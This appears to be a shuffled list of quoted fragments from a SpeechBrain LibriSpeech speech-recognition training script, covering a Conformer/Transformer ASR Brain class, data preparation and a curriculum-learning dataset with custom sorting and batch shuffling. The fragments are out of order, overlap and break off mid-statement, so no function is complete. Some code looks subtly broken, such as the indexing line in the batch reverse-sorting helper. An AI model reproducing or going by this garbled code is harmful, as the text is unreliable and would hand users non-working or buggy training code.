reverse=True # )", "# report different epoch stages according current stage current_epoch = self.hparams.epoch_counter.current if current_epoch", "isinstance(valid_set, LoopedLoader) ): valid_set = self.make_dataloader( valid_set, stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs, ) self.on_fit_start() self.train_set", "select_n : None, int If not None, only keep (at most) the first", "class ASR(sb.core.Brain): r\"\"\"Brain class abstracts away the details of data loops. The primary", "between them. Decoding is performed with (CTC/Att joint) beamsearch coupled with a neural", "batch_count = math.ceil(data_count / batch_size) shuffled_data_ids = [] for batch in np.flipud(np.arange(batch_count)): start_index", "in data_ids: data_id[weights[data_id]] = data_id data_count = len(data_ids) batch_count = math.ceil(data_count / batch_size)", "hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"],", "): \"\"\"Reverse sort the dataset at batch level\"\"\" data_ids = list(weights.keys()) for data_id", "or stage == sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") # log stats and save", "forward modules src = self.modules.CNN(feats) enc_out, pred = self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index", "mode only runs a few batches if self.debug and self.step == self.debug_batches: break", "is used directly. valid_set : Dataset, DataLoader A set of data to use", "python train.py hparams/conformer.yaml With the default hyperparameters, the system employs a convolutional frontend", "speechbrain.dataio.sampler import ReproducibleRandomSampler from tqdm.contrib import tqdm import numpy as np from functools", "= tokenizer.encode_as_ids(wrd) yield tokens_list tokens_bos = torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list)) yield tokens_bos tokens_eos =", "device (str) The location for performing computations. auto_mix_prec (bool) If ``True``, automatic mixed-precision", "for k in test_datasets.keys(): # keys are test_clean, test_other etc asr_brain.hparams.wer_file = os.path.join(", "coupled with a neural language model. To run this recipe, do the following:", "Relies on the existence of multiple functions that can (or should) be overridden.", "datasets, [\"id\", \"sig\", \"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], ) return train_data, valid_data, test_datasets, tokenizer", "passed, all epochs are run. jit_module_keys (list of str) List of keys in", "if current_epoch <= self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__", "tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4. Set output: sb.dataio.dataset.set_output_keys( datasets, [\"id\", \"sig\", \"wrd\", \"tokens_bos\",", "learning for all epochs * ``n`` - Use curriculum learning for ``n`` number", "to have a certain behavior: * ``fit_batch()`` * ``evaluate_batch()`` * ``update_average()`` If the", "initialization was done with distributed_count > 0 and the distributed_backend is ddp, this", "\"\"\"This function prepares the datasets to be used in the brain class. It", "len(data_ids) batch_count = math.ceil(data_count / batch_size) shuffled_data_ids = [] for batch in np.flipud(np.arange(batch_count)):", "accessible via an ``hparams`` attribute, using \"dot\" notation: e.g., self.hparams.model(x). run_opts : dict", "only runs a few batches if self.debug and self.step == self.debug_batches: break if", "isinstance(min_value,int): min_value = float(min_value) if isinstance(max_value,int): max_value = float(max_value) for key,value in weights.items():", "to sort the dataset. ordering_info : str Information to create weights based on", "a simple use case (e.g., training a single model with a single dataset)", "ordering_type == \"sorted\": if weights == None: # Create dataset using ordering info", "of the checkpoints from last 5 epochs. The experiment file is flexible enough", "for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights = {} for index,id in enumerate(shuffled_ids): weights[id]", "shuffle the dataset at batch level\"\"\" data_ids = list(weights.keys()) for data_id in data_ids:", "dynamic items (initially deep copied from this, so they have the same dynamic", "in enumerate(shuffled_ids): weights[id] = index return weights def _random_shuffled_batches( self, weights=None, batch_size=8, reverse=False", "augmentation if specified if stage == sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs,", "if interrupted. inter_epoch_dataset_updation : bool Whether dataset must be updated every between epochs", "print(batch.duration) # # print(batch.wrd) # # if cnt == 5: # # exit()", "sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, # ) train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder},", "so change the optimizer from Adam to SGD self.check_and_reset_optimizer() predictions = self.compute_forward(batch, sb.Stage.TRAIN)", "stage is handled specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return dataloader class", "None, dict Map from data_id to weight, these weight(s) will be used to", "how to order batches. - Possible Values are `contiguous`, `random`, `sorted`, `reverse-sorted` -", "# if the model is resumed from stage two, reinitialize the optimizer current_epoch", "for index,id in enumerate(shuffled_ids): weights[id] = index return weights def _random_shuffled_batches( self, weights=None,", "partial function definition). By default, this will be passed all modules in ``modules``", "= torch.cat([wav_lens, wav_lens]) tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0) # compute features feats =", "sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w)", "!= sb.Stage.TRAIN: self.acc_metric = self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch):", "stage # delete the rest of the intermediate checkpoints # ACC is set", "YAML file). The tokenizer is loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) #", "like splitting the training data into subsets for each device and only saving", "**hparams[\"valid_dataloader_opts\"] # ) # with tqdm( # train_set, # initial=0, # dynamic_ncols=True, #", "torch.optim.SGD): self.switched = True if self.switched is True: return if current_epoch > self.hparams.stage_one_epochs:", "compiled. distributed_count (int) Number of devices to run on. distributed_backend (str) One of", "(e.g, train-clean 100 rather than the full one), and many other possible variations.", "for key, func in key_test.items(): if bool(func(computed[key])): continue return False return True temp_keys", "> 0 and time.time() - last_ckpt_time >= self.ckpt_interval_minutes * 60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time", "many other possible variations. Authors * <NAME> 2020 * <NAME> 2020 * <NAME>", "the data_ids in random order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create", "else: return 0 class ASR(sb.core.Brain): r\"\"\"Brain class abstracts away the details of data", "epochs and datasets to improve objective. Relies on the existence of multiple functions", "only runs a few batches if self.debug and self.step == self.debug_batches: break #", "[i for k, i in test_datasets.items()] # We get the tokenizer as we", "for data_id in data_ids: data_id[weights[data_id]] = data_id data_count = len(data_ids) batch_count = math.ceil(data_count", "in key_min_value.items(): if computed[key] >= limit: continue return False for key, limit in", "called on them. opt_class : torch.optim class A torch optimizer constructor that has", "hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer )", "avg_valid_loss, epoch], ) # Debug mode only runs a few epochs if self.debug", "def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints(", "is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage == sb.Stage.TEST: hyps, _", "\"OOPS!! Batchwise sorting gone wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id]", "> 0 else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) # order entire", "else: raise NotImplementedError( \"Ordering Type must be one of random, sorted, weighted_sorted.\" )", "each epoch self.nonfinite_count = 0 if self.train_sampler is not None and hasattr( self.train_sampler,", "pred = self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) # output layer for ctc", "run on. distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str) The", "``-1`` - Use curriculum learning for all epochs * ``n`` - Use curriculum", "res = self._output_length_comparator(key1,key2) elif key == \"alphabetic\": res = self._alphabetic_comparator(key1,key2) res *= order", "checkpoint last_ckpt_time = time.time() # Only show progressbar if requested and main_process enable", "# Dataset prep (parsing Librispeech) from librispeech_prepare import prepare_librispeech # noqa # Create", "): \"\"\"Compare two data points based on output length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2", "distributed_count > 0 and the distributed_backend is ddp, this will generally handle multiprocess", "enable = progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) * total_steps with", "in debug mode, Default ``2``. If a non-positive number is passed, all epochs", "on pre-defined keys( and/or methods) and their order. - Format : \"<key1>:<order1>,<key2>:<order2>,........\" -", "bool Whether to display the progress of each epoch in a progressbar. \"\"\"", "= self._random_shuffle_data_ids(data_ids) weights = {} for index,id in enumerate(shuffled_ids): weights[id] = index return", "(float) Amount of time between saving intra-epoch checkpoints, in minutes, default: ``15.0``. If", "== True min_weight : None, int If not None, will only keep data_point", "intermediate checkpoints # ACC is set to 1.1 so checkpointer only keeps the", "= sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\") # test is separate", "\"\"\"Returns a list of data ids, fulfilling the filtering criteria.\"\"\" def combined_filter(computed, key_min_value,", "Stage import time def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): # TRAIN stage", "# disable=False, # ) as t: # cnt = 0 # for batch", "device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function prepares the datasets to", "if self.checkpointer is not None: # do not reload the weights if training", "Map from key (in data or in dynamic items) to limit, will only", "# # we sort training data to speed up training and get better", "must be random, ascending or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\":", "= self.hparams.epoch_counter.current current_optimizer = self.optimizer if current_epoch > self.hparams.stage_one_epochs: del self.optimizer self.optimizer =", "for key, limit in key_max_value.items(): if computed[key] <= limit: continue return False for", "dataset into batches of size `batch_size` and order these batches randomly to create", "): # TRAIN stage is handled specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs )", "the data example fulfills the filtering criteria\"\"\" for key, limit in key_min_value.items(): if", "True min_weight : None, int If not None, will only keep data_point if", "Activate it only with cuda. max_grad_norm (float) Default implementation of ``fit_batch()`` uses ``clip_grad_norm_``", "two methods is done. For more complicated use cases, such as multiple modules", "= batch.sig tokens_bos, _ = batch.tokens_bos # Add augmentation if specified if stage", "] target_words = [wrd.split(\" \") for wrd in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) #", "dataset using preferred cl approach return else: # recreate dataset using preferred cl", "last 5 epochs. The experiment file is flexible enough to support a large", "{} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _custom_sorted_weights( self,", "= self.update_average( loss, avg_valid_loss ) # Debug mode only runs a few batches", "as equal, continue # comparing using the next key, else return the result", "== 0: # for the sake of efficiency, we only perform beamsearch with", "keys: `input_length`, `output_length`, `alphabetic` - Options for order: `asc`, `desc` - Example: *", "key2 ): \"\"\"Compare two data points based on output length\"\"\" length1 = len(self.data[key1][\"wrd\"])", "will only keep data_point if weight[data_point] < max_weight weights : None, dict Map", ") filtered_data_ids = [] with self.output_keys_as(temp_keys): for i, data_id in enumerate(data_ids): data_point =", "import cmp_to_key from torch.utils.data import DataLoader from speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core import", "model is resumed from stage two, reinitialize the optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer", "if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key ) ckpt = sb.utils.checkpoints.average_checkpoints( ckpts,", "else: # raise NotImplementedError( # \"sorting must be random, ascending or descending\" #", "hparams/conformer.yaml With the default hyperparameters, the system employs a convolutional frontend and a", "overridden methods. These will be accessible via an ``hparams`` attribute, using \"dot\" notation:", "weight within the range (`min_value`, `max_value`)\"\"\" if min_value == None and max_value ==", "+= data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise shuffling gone wrong.\" weights", "equal, continue # comparing using the next key, else return the result if", "creates a dictionary out of it\"\"\" ordering_info = [] orderings = dataset_order.split(\",\") for", "can be changed by overriding the ``configure_optimizers()`` method. hparams : dict Each key:value", "batch = batch.to(self.device) wavs, wav_lens = batch.sig tokens_bos, _ = batch.tokens_bos # Add", "sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in `ordering_info`", "1. # Dataset prep (parsing Librispeech) from librispeech_prepare import prepare_librispeech # noqa #", "else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) # order entire dataset if", "len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise sorting gone wrong.\" weights = {} for", "filtered_data_ids = [] with self.output_keys_as(temp_keys): for i, data_id in enumerate(data_ids): data_point = self.data[data_id]", "interrupted right before stage 2 group = current_optimizer.param_groups[0] if \"momentum\" not in group:", "for k, i in test_datasets.items()] # We get the tokenizer as we need", "0 else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) # order entire dataset", "characters instead of BPE), training split (e.g, train-clean 100 rather than the full", "self.update_average( loss, self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss) # Write training summary to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss,", "<NAME> 2020 * <NAME> 2020 * <NAME> 2021 \"\"\" import os import torch", "The experiment file is flexible enough to support a large variety of different", "from functools import cmp_to_key from torch.utils.data import DataLoader from speechbrain.dataio.dataloader import LoopedLoader from", "k in test_datasets.keys(): # keys are test_clean, test_other etc asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"],", "/ batch_size) shuffled_data_ids = [] for batch in np.random.permutation(np.arange(batch_count)): start_index = batch_size *", "wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs, wavs_noise], dim=0) wav_lens = torch.cat([wav_lens, wav_lens])", "= self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else: raise NotImplementedError( \"Ordering Type must be one", "making the train_loader (if train_set is a Dataset, not DataLoader). E.G. batch_size, num_workers.", "CLI: hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin: hparams = load_hyperpyyaml(fin,", "that need to be overridden are: * ``compute_forward()`` * ``compute_objectives()`` The example below", "hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], }, ) # here we create the datasets", "optimizer if training enters stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current if not hasattr(self, \"switched\"):", "weights if isinstance(min_value,int): min_value = float(min_value) if isinstance(max_value,int): max_value = float(max_value) for key,value", "_random_shuffled_batches( self, weights=None, batch_size=8, reverse=False ): \"\"\"Randomly shuffle the dataset at batch level\"\"\"", "epoch) self.modules.eval() avg_valid_loss = 0.0 with torch.no_grad(): for batch in tqdm( valid_set, dynamic_ncols=True,", "tokenizer = dataio_prepare(hparams) # # We download the pretrained LM from HuggingFace (or", "global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step) # Debug mode only runs a few batches if", "filtered_data_ids def _weighted_filtered_sorted_ids( self, weights, min_value=None, max_value=None, select_n=None, reverse=False ): \"\"\"Returns a list", "and sub-word units estimated with Byte Pairwise Encoding (BPE) are used as basic", "None: # Create dataset using ordering info weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass", "hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"descending\": # train_data = train_data.filtered_sorted( #", "self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called at the end of a", "# ) # # when sorting do not shuffle in dataloader ! otherwise", "time.time() # Run train \"on_stage_end\" on all processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch) self.avg_train_loss =", "to resume training if interrupted if self.checkpointer is not None: # do not", "the filtering criteria.\"\"\" def combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if the data example", "have trainable parameters, and will have ``train()``/``eval()`` called on them. opt_class : torch.optim", "the end of a epoch. This is used to handle , whether the", "it only with cuda. max_grad_norm (float) Default implementation of ``fit_batch()`` uses ``clip_grad_norm_`` with", "train_set is a Dataset, not DataLoader). E.G. batch_size, num_workers. DataLoader kwargs are all", "LM to give user some idea of how the AM is doing hyps,", "= self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value, key_max_value, key_test): filtered_data_ids.append(data_id) return filtered_data_ids def _weighted_filtered_sorted_ids( self,", "data_id data_count = len(data_ids) batch_count = math.ceil(data_count / batch_size) shuffled_data_ids = [] for", "more complicated use cases, such as multiple modules that need to be updated,", "super().__init__( modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer ) # save attributes related to curriculum", "wav_lens) elif stage == sb.Stage.TEST: hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq,", "current_epoch % valid_search_interval == 0 or stage == sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\")", "Dataset, DataLoader A set of data to use for training. If a Dataset", "or isinstance(train_set, LoopedLoader) ): train_set = self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs ) if valid_set", "loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w) # save the", "to implement these operations in the same method is that computing some dynamic", "set of options to change the runtime environment, including debug (bool) If ``True``,", "self, data_ids, dataset_orderings ): \"\"\"Create `weights` for data points using `ordering_info`\"\"\" def compare(key1,key2):", "save the averaged checkpoint at the end of the evaluation stage # delete", "the training data into subsets for each device and only saving a checkpoint", ") t.set_postfix(train_loss=self.avg_train_loss) # Write training summary to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc,", "training is interrupted right before stage 2 group = current_optimizer.param_groups[0] if \"momentum\" not", "fulfilling the filtering criteria.\"\"\" def combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if the data", "sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\", \"tokens_bos\",", "optimizer added to continue training if interrupted. inter_epoch_dataset_updation : bool Whether dataset must", "audio_pipeline) # 3. Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\", \"tokens_bos\", \"tokens_eos\", \"tokens\"", "Transformer decoder. Beamsearch coupled with a Transformer language model is used on the", "# multi-gpu (ddp) save data preparation run_on_main( prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"],", "``output_length`` in descending order Note: This is used only if `weights` is None", "debug_batches (int) Number of batches to run in debug mode, Default ``2``. debug_epochs", "self.hparams.gradient_accumulation == 0: # gradient clipping & early stop if loss is not", "making the valid_loader (if valid_set is a Dataset, not DataLoader). E.g., batch_size, num_workers.", "train_set total_steps = len(train_set) if progressbar is None: progressbar = not self.noprogressbar #", "and override any methods for which the default behavior does not match the", "_ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage == sb.Stage.TEST: hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)", "valid_loader_kwargs : dict Kwargs passed to `make_dataloader()` for making the valid_loader (if valid_set", "data_ids ): \"\"\"Shuffle the data_ids in random order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights( self,", "= len(train_set) if progressbar is None: progressbar = not self.noprogressbar # Iterate epochs", "data points based on input length\"\"\" duration1 = float(self.data[key1][\"duration\"]) duration2 = float(self.data[key2][\"duration\"]) if", "or in dynamic items) to func, will only keep data_point if bool(func(data_point[key])) ==", "non-positive number is passed, all epochs are run. jit_module_keys (list of str) List", "Whether dataset must be updated every between epochs or not. It is used", "test_other etc asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\",", "weights[id] = index return weights def _random_shuffled_batches( self, weights=None, batch_size=8, reverse=False ): \"\"\"Randomly", "Each key:value pair should consist of a string key and a hyperparameter that", "the training start\"\"\" super().on_fit_start() # if the model is resumed from stage two,", "not reload the weights if training is interrupted right before stage 2 group", "be expensive, and this way the filtering and sorting steps don't need to", "- Format : \"<key1>:<order1>,<key2>:<order2>,........\" - Options for keys: `input_length`, `output_length`, `alphabetic` - Options", "A set of options to change the runtime environment, including debug (bool) If", "epochs * ``n`` - Use curriculum learning for ``n`` number of epochs By", "of it\"\"\" ordering_info = [] orderings = dataset_order.split(\",\") for order in orderings: if", "[ tokenizer.decode_ids(utt_seq).split(\" \") for utt_seq in hyps ] target_words = [wrd.split(\" \") for", "intra-epoch checkpoint last_ckpt_time = time.time() # Only show progressbar if requested and main_process", "logits = self.modules.ctc_lin(enc_out) p_ctc = self.hparams.log_softmax(logits) # output layer for seq2seq log-probabilities pred", "a lambda or partial function definition). By default, this will be passed all", "\"ascending\": # # we sort training data to speed up training and get", "employs a convolutional frontend and a transformer. The decoder is based on a", "out of it\"\"\" ordering_info = [] orderings = dataset_order.split(\",\") for order in orderings:", "wav_lens) wavs = torch.cat([wavs, wavs_noise], dim=0) wav_lens = torch.cat([wav_lens, wav_lens]) tokens_bos = torch.cat([tokens_bos,", "<NAME> 2020 * <NAME> 2021 \"\"\" import os import torch from torch.utils.tensorboard import", "using `ordering_info`\"\"\" def compare(key1,key2): \"\"\" Comparing logic, as `ordering_info` can contain multiple keys", "for key, limit in key_min_value.items(): if computed[key] >= limit: continue return False for", "predictions, batch, stage): \"\"\"Computes the loss (CTC+NLL) given predictions and targets.\"\"\" (p_ctc, p_seq,", "two data points based on alphabetic order\"\"\" text1 = self.data[key1][\"wrd\"] text2 = self.data[key2][\"wrd\"]", "else return the result if res == 0: continue else: return res return", "\"sorted\": pass elif batch_selection == \"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError(", "self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step) # Debug mode only", "as t: for batch in t: self.step += 1 global_step = completed_steps +", "self.optimizer.__class__.__name__ epoch_stats = { \"epoch\": epoch, \"lr\": lr, \"steps\": steps, \"optimizer\": optimizer, }", "in dataloader ! otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"]", "full one), and many other possible variations. Authors * <NAME> 2020 * <NAME>", "weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None, ): \"\"\"Get a filtered and/or sorted version of", "self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) # order entire dataset if ordering_type == \"random\": weights", "is flexible enough to support a large variety of different systems. By properly", "def _reverse_sort_batches( self, weights=None, batch_size=8 ): \"\"\"Reverse sort the dataset at batch level\"\"\"", "curriculum learning for all epochs * ``n`` - Use curriculum learning for ``n``", "def curriculum_based_filtered_sorted( self, key_min_value={}, key_max_value={}, key_test={}, min_weight=None, max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None,", "points based on input length\"\"\" duration1 = float(self.data[key1][\"duration\"]) duration2 = float(self.data[key2][\"duration\"]) if duration1", "the ``fit()`` method, one should sub-class the ``Brain`` class and override any methods", "nonfinite count to 0 each epoch self.nonfinite_count = 0 if self.train_sampler is not", "self.debug_batches: break if ( self.checkpointer is not None and self.ckpt_interval_minutes > 0 and", "methods can be overridden: * ``fit_batch()`` * ``evaluate_batch()`` Arguments --------- modules : dict", "hparams=hparams, run_opts=run_opts, checkpointer=checkpointer ) # save attributes related to curriculum learning self.inter_epoch_dataset_updation =", "\"on_stage_end\" on all processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch) self.avg_train_loss = 0.0 self.step = 0", "operations in the same method is that computing some dynamic items may be", "\"\"\"Computes the loss (CTC+NLL) given predictions and targets.\"\"\" (p_ctc, p_seq, wav_lens, hyps,) =", "the first n filtered data_points. The possible sorting is applied, but only on", "length2 = len(self.data[key2][\"wrd\"]) if length1 > length2: return 1 elif length1 < length2:", ") # output layer for ctc log-probabilities logits = self.modules.ctc_lin(enc_out) p_ctc = self.hparams.log_softmax(logits)", "methods that need to be overridden are: * ``compute_forward()`` * ``compute_objectives()`` The example", "self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + \"/tensorboard\") def compute_forward(self, batch, stage): \"\"\"Forward computations from the", "fit( self, epoch_counter, train_set, valid_set=None, progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate epochs and datasets", "``train()``/``eval()`` called on them. opt_class : torch.optim class A torch optimizer constructor that", "level. select_n : None, int If not None, only keep (at most) the", "brain class. It also defines the data processing pipeline through user-defined functions.\"\"\" data_folder", "overridden: * ``fit_batch()`` * ``evaluate_batch()`` Arguments --------- modules : dict of str:torch.nn.Module pairs", "= self.hparams.log_softmax(logits) # output layer for seq2seq log-probabilities pred = self.modules.seq_lin(pred) p_seq =", "as `ordering_info` can contain multiple keys Note: Value and its meaning * 1", ") self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=5, ) elif stage == sb.Stage.TEST:", "``fit()`` method. This behavior can be changed by overriding the ``configure_optimizers()`` method. hparams", "enable ): self.step += 1 loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss,", "# pass # else: # raise NotImplementedError( # \"sorting must be random, ascending", "self.optimizer = self.hparams.SGD(self.modules.parameters()) # Load latest checkpoint to resume training if interrupted if", "i in test_datasets.items()] # We get the tokenizer as we need it to", "self.avg_train_loss, epoch) self.avg_train_loss = 0.0 self.step = 0 # Validation stage if valid_set", "< min_value) or \\ (isinstance(max_value,float) and value > max_value): weights.pop(key,None) return weights filtered_weights", "encoder, a decoder, and an attention mechanism between them. Decoding is performed with", "items twice. Arguments --------- key_min_value : dict Map from key (in data or", "be one of random, sorted, weighted_sorted.\" ) # create Dataloader using the weights", "if self.debug and self.step == self.debug_batches: break if ( self.checkpointer is not None", "basic recognition tokens. Training is performed on the full LibriSpeech dataset (960 h).", "number of epochs By default, it is ``-1``. \"\"\" def __init__( self, modules=None,", "# print(train_data) # train_set = make_dataloader( # valid_data , # stage = Stage.TRAIN,", "distributed_count (int) Number of devices to run on. distributed_backend (str) One of ``ddp_nccl``,", "max_grad_norm (float) Default implementation of ``fit_batch()`` uses ``clip_grad_norm_`` with this value. Default: ``5``.", "CTC and negative-log likelihood targets and sub-word units estimated with Byte Pairwise Encoding", "# here we create the datasets objects as well as tokenization and encoding", "key2 * -1 - key1 < key2 * 0 - key1 = key2", "are passed to the optimizer by default if they have trainable parameters, and", "(int) Number of times to ignore non-finite losses before stopping. Default: ``3``. noprogressbar", "self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=5, ) elif stage == sb.Stage.TEST: self.hparams.train_logger.log_stats(", "train_loader_kwargs : dict Kwargs passed to `make_dataloader()` for making the train_loader (if train_set", "mode, Default ``2``. debug_epochs (int) Number of epochs to run in debug mode,", "ordering info can be , input_length, output_length, alphabetic dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type =", "weights, min_weight, max_weight, select_n ) return FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def _filter_dataset( self,", "epoch self.nonfinite_count = 0 if self.train_sampler is not None and hasattr( self.train_sampler, \"set_epoch\"", "with tqdm( # train_set, # initial=0, # dynamic_ncols=True, # disable=False, # ) as", "(loss / self.hparams.gradient_accumulation).backward() if self.step % self.hparams.gradient_accumulation == 0: # gradient clipping &", "_parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in `ordering_info` in string as input and creates", "Default: ``5``. nonfinite_patience (int) Number of times to ignore non-finite losses before stopping.", "get the tokenizer as we need it to encode the labels when creating", "key_min_value, key_max_value, key_test): filtered_data_ids.append(data_id) return filtered_data_ids def _weighted_filtered_sorted_ids( self, weights, min_value=None, max_value=None, select_n=None,", "duration2: return 1 elif duration1 < duration2: return -1 else: return 0 def", "else -1 if key == \"input_length\": res = self._input_length_comparator(key1,key2) elif key == \"output_length\":", "likelihood targets and sub-word units estimated with Byte Pairwise Encoding (BPE) are used", "class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted( self, key_min_value={}, key_max_value={}, key_test={}, min_weight=None, max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\",", "return if current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not None:", "if 